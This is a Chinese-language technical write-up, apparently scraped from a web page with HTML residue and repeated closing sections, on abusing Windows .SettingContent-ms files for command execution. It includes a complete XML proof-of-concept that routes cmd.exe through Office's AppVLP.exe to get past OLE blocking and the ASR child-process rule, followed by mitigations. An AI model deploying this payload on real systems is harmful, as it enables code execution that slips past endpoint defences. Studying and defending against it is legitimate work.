利用SettingContent-ms文件执行任意命令的技术分析<\/h1>

1. 背景与挑战<\/h2>

在Windows安全加固环境下，攻击者面临以下限制：<\/p>

文件格式选择受限（HTA、Office宏、VBS、JS等）<\/li>
Office 2016默认拦截通过OLE嵌入的危险文件格式<\/li>

Windows 10攻击面缩减(ASR)规则限制（特别是"阻止Office应用程序创建子进程"规则）<\/li> <\/ul>

2. SettingContent-ms文件格式分析<\/h2>

2.1 文件格式特性<\/h3>

Windows 10引入的格式，用于创建设置页面快捷方式<\/li>
本质是XML文件，包含Windows 10设置二进制文件路径<\/li>

关键元素：

<deeplink><\/code>，可接收带参数的二进制文件并执行<\/li>
<\/ul>
2.2 命令执行能力<\/h3>
当替换control.exe<\/code>为cmd.exe \/c calc.exe<\/code>时：<\/p>

双击文件直接执行命令，无"open"提示<\/li>
从互联网下载后点击"open"按钮仍会执行<\/li>
文件带有网页标记(Mark-Of-the-Web)但无警告<\/li>
<\/ul>
3. 攻击技术实现<\/h2>
3.1 通过Office文档嵌入<\/h3>

Office 2016 OLE黑名单不包含SettingContent-ms格式<\/li>
嵌入恶意.SettingContent-ms文件可绕过OLE限制<\/li>
用户仅看到"Open Package Contents"提示<\/li>
<\/ul>
3.2 绕过ASR规则<\/h3>
ASR子进程创建规则(GUID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A)的绕过方法：<\/p>

发现ASR基于白名单路径放行Office相关二进制文件<\/li>
利用Office路径中的AppVLP.exe<\/code>（应用程序虚拟化二进制文件）<\/li>
构造.SettingContent-ms文件调用AppVLP.exe<\/code>并传递cmd.exe<\/code>作为参数<\/li>
<\/ol>
示例有效载荷：<\/p>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><PCSettings><\/span>
<\/span><\/span>  <SearchableContent<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/Search\/2013\/SettingContent"<\/span>><\/span>
<\/span><\/span>    <ApplicationInformation><\/span>
<\/span><\/span>      <AppID><\/span>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel<\/AppID><\/span>
<\/span><\/span>      <DeepLink><\/span>C:\Program Files\Microsoft Office\root\Office16\AppVLP.exe cmd.exe \/c calc.exe<\/DeepLink><\/span>
<\/span><\/span>      <Icon><\/span>%SystemRoot%\system32\control.exe<\/Icon><\/span>
<\/span><\/span>    <\/ApplicationInformation><\/span>
<\/span><\/span>    <SettingIdentity><\/span>
<\/span><\/span>      <PageID><\/PageID><\/span>
<\/span><\/span>      <HostID><\/span>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}<\/HostID><\/span>
<\/span><\/span>    <\/SettingIdentity><\/span>
<\/span><\/span>    <SettingInformation><\/span>
<\/span><\/span>      <Description><\/span>@shell32.dll,-4161<\/Description><\/span>
<\/span><\/span>      <Keywords><\/span>@shell32.dll,-4161<\/Keywords><\/span>
<\/span><\/span>    <\/SettingInformation><\/span>
<\/span><\/span>  <\/SearchableContent><\/span>
<\/span><\/span><\/PCSettings><\/span>
<\/span><\/span><\/code><\/pre>4. 防御措施<\/h2>
4.1 文件执行限制<\/h3>

限制.SettingContent-ms文件仅在C:\Windows\ImmersiveControlPanel<\/code>路径执行<\/li>
<\/ul>
4.2 监控措施<\/h3>

监控命令行日志（所有通过此文件执行的命令都会被记录）<\/li>
使用Sysmon监视Office应用程序创建的子进程异常<\/li>
<\/ul>
4.3 注册表修改<\/h3>

修改HKLM:\SettingContent\Shell\Open\Command<\/code>中的DelegateExecute<\/code>键为空值<\/li>
注意：可能破坏操作系统某些功能，需谨慎操作<\/li>
<\/ul>
5. 技术总结<\/h2>
此攻击方法结合了：<\/p>

未被OLE拦截的.SettingContent-ms文件格式<\/li>
从互联网下载后无警告执行的特性<\/li>
利用Office路径中的合法二进制文件绕过ASR规则<\/li>
<\/ol>
PoC示例：

SettingContent-ms文件PoC<\/a><\/p>

利用SettingContent-ms文件执行任意命令的技术分析<\/h1>

2. SettingContent-ms文件格式分析<\/h2>

3. 攻击技术实现<\/h2>

4. 防御措施<\/h2>

5. 技术总结<\/h2> 此攻击方法结合了：<\/p> 未被OLE拦截的.SettingContent-ms文件格式<\/li> 从互联网下载后无警告执行的特性<\/li> 利用Office路径中的合法二进制文件绕过ASR规则<\/li> <\/ol> PoC示例： SettingContent-ms文件PoC<\/a><\/p>

5. 技术总结<\/h2>
此攻击方法结合了：<\/p>

未被OLE拦截的.SettingContent-ms文件格式<\/li>
从互联网下载后无警告执行的特性<\/li>
利用Office路径中的合法二进制文件绕过ASR规则<\/li> <\/ol>
PoC示例：
SettingContent-ms文件PoC<\/a><\/p>